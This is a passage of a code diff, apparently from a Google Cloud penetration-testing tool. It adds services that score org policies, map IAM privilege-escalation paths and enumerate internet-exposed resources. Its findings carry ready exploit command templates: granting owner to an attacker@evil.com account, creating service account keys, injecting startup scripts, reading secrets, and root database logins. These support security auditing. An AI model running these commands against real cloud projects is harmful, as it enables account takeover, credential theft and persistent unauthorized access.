}, + // Service account key creation + "constraints/iam.disableServiceAccountKeyCreation": { + Description: "Prevents service account key creation", + RiskWhenWeak: "Allows persistent SA key creation for long-term access", + DefaultSecure: false, + }, + "constraints/iam.disableServiceAccountKeyUpload": { + Description: "Prevents uploading service account keys", + RiskWhenWeak: "Allows external keys to be uploaded for SA access", + DefaultSecure: false, + }, + // Workload identity + "constraints/iam.workloadIdentityPoolProviders": { + Description: "Restricts workload identity pool providers", + RiskWhenWeak: "Allows external identity providers to assume GCP identities", + DefaultSecure: false, + }, + "constraints/iam.workloadIdentityPoolAwsAccounts": { + Description: "Restricts AWS accounts for workload identity", + RiskWhenWeak: "Allows any AWS account to assume GCP identity", + DefaultSecure: false, + }, + // Compute restrictions + "constraints/compute.requireShieldedVm": { + Description: "Requires Shielded VMs", + RiskWhenWeak: "Allows VMs without Shielded VM protections", + DefaultSecure: false, + }, + "constraints/compute.requireOsLogin": { + Description: "Requires OS Login for SSH access", + RiskWhenWeak: "Allows metadata-based SSH keys instead of centralized access", + DefaultSecure: false, + }, + "constraints/compute.vmExternalIpAccess": { + Description: "Restricts which VMs can have external IPs", + RiskWhenWeak: "Allows any VM to have an external IP", + DefaultSecure: false, + }, + "constraints/compute.disableSerialPortAccess": { + Description: "Disables serial port access to VMs", + RiskWhenWeak: "Allows serial console access to VMs", + DefaultSecure: false, + }, + "constraints/compute.disableNestedVirtualization": { + Description: "Disables nested virtualization", + RiskWhenWeak: "Allows nested VMs for potential sandbox escape", + DefaultSecure: false, + }, + // Storage restrictions + "constraints/storage.uniformBucketLevelAccess": { + Description: "Requires uniform bucket-level access", + RiskWhenWeak: "Allows ACL-based access which is harder to audit", + DefaultSecure: false, + }, + "constraints/storage.publicAccessPrevention": { + Description: "Prevents public access to storage buckets", + RiskWhenWeak: "Allows public bucket/object access", + DefaultSecure: false, + }, + // SQL restrictions + "constraints/sql.restrictPublicIp": { + Description: "Restricts public IPs on Cloud SQL", + RiskWhenWeak: "Allows Cloud SQL instances with public IPs", + DefaultSecure: false, + }, + "constraints/sql.restrictAuthorizedNetworks": { + Description: "Restricts authorized networks for Cloud SQL", + RiskWhenWeak: "Allows broad network access to Cloud SQL", + DefaultSecure: false, + }, + // GKE restrictions + "constraints/container.restrictPublicEndpoint": { + Description: "Restricts GKE public endpoints", + RiskWhenWeak: "Allows GKE clusters with public API endpoints", + DefaultSecure: false, + }, + // Resource location + "constraints/gcp.resourceLocations": { + Description: "Restricts resource locations/regions", + RiskWhenWeak: "Allows resources in any region (compliance risk)", + DefaultSecure: false, + }, + // Service usage + "constraints/serviceuser.services": { + Description: "Restricts which services can be enabled", + RiskWhenWeak: "Allows any GCP service to be enabled", + DefaultSecure: false, + }, + // VPC + "constraints/compute.restrictSharedVpcSubnetworks": { + Description: "Restricts Shared VPC subnetworks", + RiskWhenWeak: "Allows access to any Shared VPC subnetwork", + DefaultSecure: false, + }, + "constraints/compute.restrictVpnPeerIPs": { + Description: "Restricts VPN peer IPs", + RiskWhenWeak: "Allows VPN tunnels to any peer", + DefaultSecure: false, + }, +} + +// ListProjectPolicies lists all org policies for a project +func (s *OrgPolicyService) ListProjectPolicies(projectID string) ([]OrgPolicyInfo, error) { + ctx := context.Background() + var service *orgpolicy.Service + var err error + + if s.session != nil { + service, err = orgpolicy.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = orgpolicy.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create org policy service: %v", err) + } + + var policies []OrgPolicyInfo + parent := fmt.Sprintf("projects/%s", projectID) + + err = service.Projects.Policies.List(parent).Pages(ctx, func(resp *orgpolicy.GoogleCloudOrgpolicyV2ListPoliciesResponse) error { + for _, policy := range resp.Policies { + info := s.parsePolicyInfo(policy, projectID) + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list policies: %v", err) + } + + return policies, nil +} + +func (s *OrgPolicyService) parsePolicyInfo(policy *orgpolicy.GoogleCloudOrgpolicyV2Policy, projectID string) OrgPolicyInfo { + info := OrgPolicyInfo{ + Name: policy.Name, + ProjectID: projectID, + } + + // Extract constraint name from policy name + parts := strings.Split(policy.Name, "/policies/") + if len(parts) > 1 { + info.Constraint = "constraints/" + parts[1] + } + + // Parse the spec + if policy.Spec != nil { + info.InheritParent = policy.Spec.InheritFromParent + + for _, rule := range policy.Spec.Rules { + if rule == nil { + continue + } + + // In v2 API, these are booleans + info.Enforced = rule.Enforce + info.AllowAll = rule.AllowAll + info.DenyAll = rule.DenyAll + + if rule.Values != nil { + info.AllowedValues = append(info.AllowedValues, rule.Values.AllowedValues...) + info.DeniedValues = append(info.DeniedValues, rule.Values.DeniedValues...) + } + } + } + + // Analyze risk + info.RiskLevel, info.RiskReasons, info.SecurityImpact = s.analyzePolicy(info) + + return info +} + +func (s *OrgPolicyService) analyzePolicy(policy OrgPolicyInfo) (string, []string, string) { + var reasons []string + var impact string + riskScore := 0 + + // Get security context for this constraint + secInfo, isSecurityRelevant := SecurityRelevantConstraints[policy.Constraint] + + if isSecurityRelevant { + impact = secInfo.RiskWhenWeak + + // Check if policy is weakened + if policy.AllowAll { + reasons = append(reasons, fmt.Sprintf("Policy allows ALL values - %s", secInfo.Description)) + riskScore += 3 + } + + // Check for overly permissive allowed values + if len(policy.AllowedValues) > 0 { + if containsWildcard(policy.AllowedValues) { + reasons = append(reasons, "Allowed values contains wildcard pattern") + riskScore += 2 + } + } + + // Check if important security constraint is not enforced + if !policy.Enforced && secInfo.DefaultSecure { + reasons = append(reasons, fmt.Sprintf("Security constraint not enforced: %s", secInfo.Description)) + riskScore += 2 + } + + // Check for inheritance issues + if policy.InheritParent && policy.AllowAll { + reasons = append(reasons, "Inherits from parent but also allows all - may override parent restrictions") + riskScore += 1 + } + } else { + impact = "Custom or less common constraint" + } + + // Determine risk level + if riskScore >= 3 { + return "HIGH", reasons, impact + } else if riskScore >= 2 { + return "MEDIUM", reasons, impact + } else if riskScore >= 1 { + return "LOW", reasons, impact + } + return "INFO", reasons, impact +} + +func containsWildcard(values []string) bool { + for _, v := range values { + if v == "*" || strings.Contains(v, "/*") || v == "under:*" { + return true + } + } + return false +} diff --git a/gcp/services/privescService/privescService.go b/gcp/services/privescService/privescService.go new file mode 100644 index 00000000..af0ef16a --- /dev/null +++ b/gcp/services/privescService/privescService.go @@ -0,0 +1,442 @@ +package privescservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iam/v1" +) + +type PrivescService struct { + session *gcpinternal.SafeSession +} + +func New() *PrivescService { + return &PrivescService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *PrivescService { + return &PrivescService{session: session} +} + +// PrivescPath represents a privilege escalation opportunity +type PrivescPath struct { + Principal string `json:"principal"` // Who has this capability + PrincipalType string `json:"principalType"` // user, serviceAccount, group + Method string `json:"method"` // The privesc method name + TargetResource string `json:"targetResource"` // What resource they can escalate on + Permissions []string `json:"permissions"` // Permissions enabling this + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM + Description string `json:"description"` // Explanation + ExploitCommand string `json:"exploitCommand"` // Command to exploit + ProjectID string `json:"projectId"` +} + +// DangerousPermission represents a permission that enables privilege escalation +type DangerousPermission struct { + Permission string `json:"permission"` + Category string `json:"category"` // SA Impersonation, Key Creation, IAM Modification, etc. + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM + Description string `json:"description"` // What this enables +} + +// GetDangerousPermissions returns the list of known dangerous GCP permissions +func GetDangerousPermissions() []DangerousPermission { + return []DangerousPermission{ + // Service Account Impersonation - CRITICAL + {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate access tokens for any SA"}, + {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign blobs as SA (GCS signed URLs)"}, + {Permission: "iam.serviceAccounts.signJwt", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign JWTs as SA (impersonation)"}, + {Permission: "iam.serviceAccounts.implicitDelegation", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Delegate SA identity to others"}, + + // Key Creation - CRITICAL + {Permission: "iam.serviceAccountKeys.create", Category: "Key Creation", RiskLevel: "CRITICAL", Description: "Create persistent SA keys"}, + {Permission: "storage.hmacKeys.create", Category: "Key Creation", RiskLevel: "HIGH", Description: "Create HMAC keys for S3-compatible access"}, + + // IAM Modification - CRITICAL + {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project-level IAM policy"}, + {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder-level IAM policy"}, + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org-level IAM policy"}, + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to service accounts"}, + {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Modify custom role permissions"}, + {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create new custom roles"}, + + // Compute Access - HIGH + {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify instance metadata (SSH keys, startup scripts)"}, + {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance service account"}, + {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify project-wide metadata"}, + {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH into instances via OS Login"}, + {Permission: "compute.instances.osAdminLogin", Category: "Compute", RiskLevel: "HIGH", Description: "SSH with sudo via OS Login"}, + + // Cloud Functions - HIGH + {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA identity"}, + {Permission: "cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code/SA"}, + {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Change function source code"}, + + // Cloud Run - HIGH + {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA identity"}, + {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service code/SA"}, + + // Cloud Build - HIGH + {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "HIGH", Description: "Run builds with Cloud Build SA"}, + {Permission: "cloudbuild.builds.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify build configurations"}, + + // GKE - HIGH + {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get GKE cluster credentials"}, + {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods"}, + {Permission: "container.secrets.get", Category: "GKE", RiskLevel: "HIGH", Description: "Read Kubernetes secrets"}, + + // Storage - MEDIUM + {Permission: "storage.buckets.setIamPolicy", Category: "Storage", RiskLevel: "MEDIUM", Description: "Modify bucket access"}, + {Permission: "storage.objects.create", Category: "Storage", RiskLevel: "MEDIUM", Description: "Upload objects to buckets"}, + + // Secrets - HIGH + {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values"}, + {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets", RiskLevel: "HIGH", Description: "Grant access to secrets"}, + + // Org Policies - HIGH + {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "HIGH", Description: "Modify organization policies"}, + + // Deployment Manager - HIGH + {Permission: "deploymentmanager.deployments.create", Category: "Deployment", RiskLevel: "HIGH", Description: "Deploy resources with DM SA"}, + + // API Keys - MEDIUM + {Permission: "serviceusage.apiKeys.create", Category: "API Keys", RiskLevel: "MEDIUM", Description: "Create API keys"}, + + // Actor permissions + {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation"}, + } +} + +// AnalyzeProjectPrivesc analyzes a project for privilege escalation paths +func (s *PrivescService) AnalyzeProjectPrivesc(projectID string) ([]PrivescPath, error) { + ctx := context.Background() + + // Get project IAM policy + var crmService *cloudresourcemanager.Service + var err error + + if s.session != nil { + crmService, err = cloudresourcemanager.NewService(ctx, s.session.GetClientOption()) + } else { + crmService, err = cloudresourcemanager.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create CRM service: %v", err) + } + + policy, err := crmService.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Do() + if err != nil { + return nil, fmt.Errorf("failed to get project IAM policy: %v", err) + } + + var paths []PrivescPath + + // Get IAM service for role resolution + var iamService *iam.Service + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + // Continue without role resolution + iamService = nil + } + + // Analyze each binding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + + // Get permissions for this role + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + + // Check each member for dangerous permissions + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForPrivesc(member, binding.Role, permissions, projectID) + paths = append(paths, memberPaths...) + } + } + + return paths, nil +} + +// getRolePermissions resolves a role to its permissions +func (s *PrivescService) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { + if iamService == nil { + return []string{} + } + + ctx := context.Background() + + // Handle different role types + var roleInfo *iam.Role + var err error + + if strings.HasPrefix(role, "roles/") { + // Predefined role + roleInfo, err = iamService.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "projects/") { + // Project custom role + roleInfo, err = iamService.Projects.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "organizations/") { + // Org custom role + roleInfo, err = iamService.Organizations.Roles.Get(role).Do() + } else { + // Assume predefined role format + roleInfo, err = iamService.Roles.Get("roles/" + role).Do() + } + + if err != nil { + // Try to query testable permissions as fallback + return s.getTestablePermissions(ctx, iamService, role, projectID) + } + + return roleInfo.IncludedPermissions +} + +// getTestablePermissions uses QueryTestablePermissions for complex cases +func (s *PrivescService) getTestablePermissions(ctx context.Context, iamService *iam.Service, role string, projectID string) []string { + // This is a simplified version - in production you'd want more robust handling + // For now, return known permissions for common roles + knownRoles := map[string][]string{ + "roles/owner": { + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccountKeys.create", + "resourcemanager.projects.setIamPolicy", + "compute.instances.setMetadata", + }, + "roles/editor": { + "compute.instances.setMetadata", + "cloudfunctions.functions.create", + "run.services.create", + }, + "roles/iam.serviceAccountAdmin": { + "iam.serviceAccountKeys.create", + "iam.serviceAccounts.setIamPolicy", + }, + "roles/iam.serviceAccountKeyAdmin": { + "iam.serviceAccountKeys.create", + }, + "roles/iam.serviceAccountTokenCreator": { + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccounts.signBlob", + "iam.serviceAccounts.signJwt", + }, + "roles/compute.instanceAdmin": { + "compute.instances.setMetadata", + "compute.instances.setServiceAccount", + }, + "roles/cloudfunctions.developer": { + "cloudfunctions.functions.create", + "cloudfunctions.functions.update", + }, + "roles/run.admin": { + "run.services.create", + "run.services.update", + }, + "roles/cloudbuild.builds.editor": { + "cloudbuild.builds.create", + }, + } + + if perms, ok := knownRoles[role]; ok { + return perms + } + + return []string{} +} + +// analyzePermissionsForPrivesc checks if a set of permissions enables privilege escalation +func (s *PrivescService) analyzePermissionsForPrivesc(member, role string, permissions []string, projectID string) []PrivescPath { + var paths []PrivescPath + + dangerousPerms := GetDangerousPermissions() + dangerousMap := make(map[string]DangerousPermission) + for _, dp := range dangerousPerms { + dangerousMap[dp.Permission] = dp + } + + // Check for direct dangerous permissions + foundDangerous := make(map[string]DangerousPermission) + for _, perm := range permissions { + if dp, ok := dangerousMap[perm]; ok { + foundDangerous[perm] = dp + } + } + + // Generate privesc paths based on found permissions + principalType := getPrincipalType(member) + cleanMember := cleanMemberName(member) + + // SA Token Creation + if dp, ok := foundDangerous["iam.serviceAccounts.getAccessToken"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SA Token Creation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can generate access tokens for any service account in the project", + ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), + ProjectID: projectID, + }) + } + + // SA Key Creation + if dp, ok := foundDangerous["iam.serviceAccountKeys.create"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "SA Key Creation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can create persistent keys for any service account", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), + ProjectID: projectID, + }) + } + + // Project IAM Modification + if dp, ok := foundDangerous["resourcemanager.projects.setIamPolicy"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Project IAM Modification", + TargetResource: projectID, + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can modify project IAM policy to grant any role", + ExploitCommand: fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:attacker@evil.com --role=roles/owner", projectID), + ProjectID: projectID, + }) + } + + // Compute Metadata Modification + if dp, ok := foundDangerous["compute.instances.setMetadata"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Compute Metadata Injection", + TargetResource: "All project instances", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can inject SSH keys or startup scripts into instances", + ExploitCommand: "gcloud compute instances add-metadata INSTANCE --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'", + ProjectID: projectID, + }) + } + + // Cloud Functions Deployment + if _, ok := foundDangerous["cloudfunctions.functions.create"]; ok { + if _, hasActAs := foundDangerous["iam.serviceAccounts.actAs"]; hasActAs { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Cloud Functions SA Abuse", + TargetResource: "Cloud Functions", + Permissions: []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"}, + RiskLevel: "HIGH", + Description: "Can deploy functions with privileged service account identity", + ExploitCommand: "gcloud functions deploy pwned --runtime=python39 --trigger-http --service-account=PRIVILEGED_SA", + ProjectID: projectID, + }) + } + } + + // Cloud Build + if dp, ok := foundDangerous["cloudbuild.builds.create"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Cloud Build SA Abuse", + TargetResource: "Cloud Build", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can run builds with Cloud Build service account (often has elevated privileges)", + ExploitCommand: "gcloud builds submit --config=cloudbuild.yaml .", + ProjectID: projectID, + }) + } + + // GKE Credentials + if dp, ok := foundDangerous["container.clusters.getCredentials"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "GKE Cluster Access", + TargetResource: "All project GKE clusters", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can get credentials for GKE clusters", + ExploitCommand: "gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE", + ProjectID: projectID, + }) + } + + // Secret Access + if dp, ok := foundDangerous["secretmanager.versions.access"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "Secret Access", + TargetResource: "All project secrets", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can read secret values from Secret Manager", + ExploitCommand: "gcloud secrets versions access latest --secret=SECRET_NAME", + ProjectID: projectID, + }) + } + + // SignBlob for GCS Signed URLs + if dp, ok := foundDangerous["iam.serviceAccounts.signBlob"]; ok { + paths = append(paths, PrivescPath{ + Principal: cleanMember, + PrincipalType: principalType, + Method: "GCS Signed URL Generation", + TargetResource: "All project service accounts", + Permissions: []string{dp.Permission}, + RiskLevel: dp.RiskLevel, + Description: "Can sign blobs as SA to generate GCS signed URLs", + ExploitCommand: "gsutil signurl -u TARGET_SA@project.iam.gserviceaccount.com gs://bucket/object", + ProjectID: projectID, + }) + } + + return paths +} + +// getPrincipalType determines the type of principal from the member string +func getPrincipalType(member string) string { + if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } else if member == "allUsers" { + return "allUsers" + } else if member == "allAuthenticatedUsers" { + return "allAuthenticatedUsers" + } + return "unknown" +} + +// cleanMemberName removes the prefix from member string +func cleanMemberName(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} diff --git a/gcp/services/publicResourcesService/publicResourcesService.go b/gcp/services/publicResourcesService/publicResourcesService.go new file mode 100644 index 00000000..a65edfc3 --- /dev/null +++ b/gcp/services/publicResourcesService/publicResourcesService.go @@ -0,0 +1,538 @@ +package publicresourcesservice + +import ( + "context" + "fmt" + "strings" + + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + run "google.golang.org/api/run/v2" + cloudfunctions "google.golang.org/api/cloudfunctions/v2" + sqladmin "google.golang.org/api/sqladmin/v1beta4" + storage "google.golang.org/api/storage/v1" +) + +type PublicResourcesService struct{} + +func New() *PublicResourcesService { + return &PublicResourcesService{} +} + +// PublicResource represents any internet-exposed GCP resource +type PublicResource struct { + ResourceType string // compute, cloudsql, cloudrun, function, gke, bucket, lb + Name string + ProjectID string + Location string + PublicEndpoint string // URL or IP + Port string // Port if applicable + Protocol string // HTTP, HTTPS, TCP, etc. + AccessLevel string // allUsers, allAuthenticatedUsers, authorized-networks, etc. + ServiceAccount string // Associated SA if any + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string + ExploitCommands []string +} + +// EnumeratePublicResources finds all public resources in a project +func (s *PublicResourcesService) EnumeratePublicResources(projectID string) ([]PublicResource, error) { + var resources []PublicResource + + // Enumerate each resource type + if computeResources, err := s.getPublicComputeInstances(projectID); err == nil { + resources = append(resources, computeResources...) + } + + if sqlResources, err := s.getPublicCloudSQL(projectID); err == nil { + resources = append(resources, sqlResources...) + } + + if runResources, err := s.getPublicCloudRun(projectID); err == nil { + resources = append(resources, runResources...) + } + + if funcResources, err := s.getPublicFunctions(projectID); err == nil { + resources = append(resources, funcResources...) + } + + if gkeResources, err := s.getPublicGKE(projectID); err == nil { + resources = append(resources, gkeResources...) + } + + if bucketResources, err := s.getPublicBuckets(projectID); err == nil { + resources = append(resources, bucketResources...) + } + + if lbResources, err := s.getPublicLoadBalancers(projectID); err == nil { + resources = append(resources, lbResources...) + } + + return resources, nil +} + +func (s *PublicResourcesService) getPublicComputeInstances(projectID string) ([]PublicResource, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, err + } + + var resources []PublicResource + + // List all instances across all zones + req := service.Instances.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, instances := range page.Items { + zoneName := zone + if strings.HasPrefix(zone, "zones/") { + zoneName = strings.TrimPrefix(zone, "zones/") + } + + for _, instance := range instances.Instances { + for _, nic := range instance.NetworkInterfaces { + for _, access := range nic.AccessConfigs { + if access.NatIP != "" { + resource := PublicResource{ + ResourceType: "compute", + Name: instance.Name, + ProjectID: projectID, + Location: zoneName, + PublicEndpoint: access.NatIP, + Protocol: "TCP/UDP", + AccessLevel: "Public IP", + RiskLevel: "MEDIUM", + RiskReasons: []string{"Instance has external IP"}, + ExploitCommands: []string{ + fmt.Sprintf("# Scan for open ports:\nnmap -sV %s", access.NatIP), + fmt.Sprintf("# SSH if port 22 open:\nssh -i ~/.ssh/google_compute_engine %s", access.NatIP), + fmt.Sprintf("gcloud compute ssh %s --zone=%s --project=%s", instance.Name, zoneName, projectID), + }, + } + + // Check service account + if len(instance.ServiceAccounts) > 0 { + resource.ServiceAccount = instance.ServiceAccounts[0].Email + } + + resources = append(resources, resource) + } + } + } + } + } + return nil + }) + + return resources, err +} + +func (s *PublicResourcesService) getPublicCloudSQL(projectID string) ([]PublicResource, error) { + ctx := context.Background() + service, err := sqladmin.NewService(ctx) + if err != nil { + return nil, err + } + + var resources []PublicResource + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, instance := range resp.Items { + // Check for public IP + for _, ip := range instance.IpAddresses { + if ip.Type == "PRIMARY" && ip.IpAddress != "" { + // Check if authorized networks include 0.0.0.0/0 + worldAccessible := false + var authNetworks []string + if instance.Settings != nil && instance.Settings.IpConfiguration != nil { + for _, net := range instance.Settings.IpConfiguration.AuthorizedNetworks { + authNetworks = append(authNetworks, net.Value) + if net.Value == "0.0.0.0/0" { + worldAccessible = true + } + } + } + + riskLevel := "MEDIUM" + riskReasons := []string{"Cloud SQL has public IP"} + if worldAccessible { + riskLevel = "CRITICAL" + riskReasons = append(riskReasons, "Authorized networks include 0.0.0.0/0 (world accessible)") + } + + port := "3306" // MySQL default + if strings.Contains(strings.ToLower(instance.DatabaseVersion), "postgres") { + port = "5432" + } else if strings.Contains(strings.ToLower(instance.DatabaseVersion), "sqlserver") { + port = "1433" + } + + resource := PublicResource{ + ResourceType: "cloudsql", + Name: instance.Name, + ProjectID: projectID, + Location: instance.Region, + PublicEndpoint: ip.IpAddress, + Port: port, + Protocol: "TCP", + AccessLevel: fmt.Sprintf("AuthNetworks: %s", strings.Join(authNetworks, ", ")), + RiskLevel: riskLevel, + RiskReasons: riskReasons, + ExploitCommands: []string{ + fmt.Sprintf("# Connect via Cloud SQL Proxy:\ngcloud sql connect %s --user=root --project=%s", instance.Name, projectID), + fmt.Sprintf("# Direct connection (if authorized):\nmysql -h %s -u root -p", ip.IpAddress), + fmt.Sprintf("# List databases:\ngcloud sql databases list --instance=%s --project=%s", instance.Name, projectID), + fmt.Sprintf("# List users:\ngcloud sql users list --instance=%s --project=%s", instance.Name, projectID), + }, + } + resources = append(resources, resource) + } + } + } + + return resources, nil +} + +func (s *PublicResourcesService) getPublicCloudRun(projectID string) ([]PublicResource, error) { + ctx := context.Background() + service, err := run.NewService(ctx) + if err != nil { + return nil, err + } + + var resources []PublicResource + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := service.Projects.Locations.Services.List(parent).Do() + if err != nil { + return nil, err + } + + for _, svc := range resp.Services { + // Check if publicly invokable + isPublic := false + accessLevel := "Authenticated" + + // Check IAM for allUsers/allAuthenticatedUsers + iamResp, err := service.Projects.Locations.Services.GetIamPolicy(svc.Name).Do() + if err == nil { + for _, binding := range iamResp.Bindings { + if binding.Role == "roles/run.invoker" { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "allUsers (PUBLIC)" + } else if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + } + } + } + } + } + + // Check ingress setting + ingress := svc.Ingress + if ingress == "INGRESS_TRAFFIC_ALL" && isPublic { + riskLevel := "HIGH" + if accessLevel == "allUsers (PUBLIC)" { + riskLevel = "CRITICAL" + } + + // Extract location from service name + parts := strings.Split(svc.Name, "/") + location := "" + if len(parts) >= 4 { + location = parts[3] + } + + resource := PublicResource{ + ResourceType: "cloudrun", + Name: svc.Name, + ProjectID: projectID, + Location: location, + PublicEndpoint: svc.Uri, + Port: "443", + Protocol: "HTTPS", + AccessLevel: accessLevel, + RiskLevel: riskLevel, + RiskReasons: []string{"Cloud Run service publicly accessible"}, + ExploitCommands: []string{ + fmt.Sprintf("# Invoke the service:\ncurl -s %s", svc.Uri), + fmt.Sprintf("# Invoke with auth:\ncurl -s -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s", svc.Uri), + fmt.Sprintf("# Describe service:\ngcloud run services describe %s --region=%s --project=%s", svc.Name, location, projectID), + }, + } + + if svc.Template != nil && len(svc.Template.Containers) > 0 { + resource.ServiceAccount = svc.Template.ServiceAccount + } + + resources = append(resources, resource) + } + } + + return resources, nil +} + +func (s *PublicResourcesService) getPublicFunctions(projectID string) ([]PublicResource, error) { + ctx := context.Background() + service, err := cloudfunctions.NewService(ctx) + if err != nil { + return nil, err + } + + var resources []PublicResource + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := service.Projects.Locations.Functions.List(parent).Do() + if err != nil { + return nil, err + } + + for _, fn := range resp.Functions { + // Check IAM for public access + iamResp, err := service.Projects.Locations.Functions.GetIamPolicy(fn.Name).Do() + if err != nil { + continue + } + + isPublic := false + accessLevel := "Authenticated" + for _, binding := range iamResp.Bindings { + if binding.Role == "roles/cloudfunctions.invoker" { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "allUsers (PUBLIC)" + } else if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + } + } + } + } + + if isPublic { + riskLevel := "HIGH" + if accessLevel == "allUsers (PUBLIC)" { + riskLevel = "CRITICAL" + } + + // Extract location + parts := strings.Split(fn.Name, "/") + location := "" + if len(parts) >= 4 { + location = parts[3] + } + + // Get URL from service config + url := "" + if fn.ServiceConfig != nil { + url = fn.ServiceConfig.Uri + } + + resource := PublicResource{ + 